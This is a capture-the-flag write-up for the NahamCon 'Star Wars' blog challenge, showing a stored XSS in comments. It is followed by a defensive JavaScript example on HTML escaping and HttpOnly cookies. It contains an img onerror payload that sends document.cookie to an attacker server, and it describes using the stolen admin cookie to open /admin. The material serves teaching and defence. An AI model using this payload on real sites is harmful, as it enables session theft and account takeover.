Nahamcon - Star Wars

18/06/2023

Who can do a CTF without a blog containing XSS 🧐?


For this challenge, we have a lovely blog about Star Wars 🛸.

We can see that there is a post and that we can comment on it. Let's try an XSS:

image 1

Yay 🎉, with a simple <img src="x" onerror="alert(0)" /> we get the alert. We can also see a small popup telling us that the admin will review our comment soon.

Well, let's swap the alert for a request that sends the cookies to our server and wait for the admin to see our comment.

<img src="x" onerror="fetch('https://server.url/?c='+document.cookie)"/>

image 2

Now that we have the cookies, let's replace ours with them and visit /admin 🤓.

image 3
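
Why both comments above worked, and what would have stopped them, as an added example that is not code from the challenge: the blog's server code is not shown, so the function names and the `session` cookie name are hypothetical. It renders the two comments from this write-up once by plain concatenation and once with HTML encoding, and builds a session cookie that `document.cookie` cannot read.

```javascript
// Added example: the challenge's server code is not shown on the page, so the
// function names and the "session" cookie name here are hypothetical.

// Vulnerable: the comment is concatenated into the page as markup.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Every character that can open a tag, an attribute value or an entity.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: the comment is encoded for the HTML text context before output.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Defence in depth: HttpOnly keeps the session out of document.cookie, so a
// script that does run in the admin's browser cannot read it.
function sessionCookieHeader(value) {
  return 'session=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Strict';
}

// True if the comment body still contains a live tag inside the wrapper div.
function containsLiveTag(html) {
  const inner = html.replace(/^<div class="comment">/, '').replace(/<\/div>$/, '');
  return /<[a-zA-Z]/.test(inner);
}

// The two comments from the write-up.
const payloads = [
  '<img src="x" onerror="alert(0)" />',
  `<img src="x" onerror="fetch('https://server.url/?c='+document.cookie)"/>`,
];

for (const p of payloads) {
  console.log('unsafe render keeps a live tag:', containsLiveTag(renderCommentUnsafe(p)));
  console.log('safe render keeps a live tag:  ', containsLiveTag(renderCommentSafe(p)));
}
console.log('Set-Cookie:', sessionCookieHeader('constructed-sample-value'));
```

Encoding the comment is the actual fix; the `HttpOnly` flag only limits what a script can take if one still gets through.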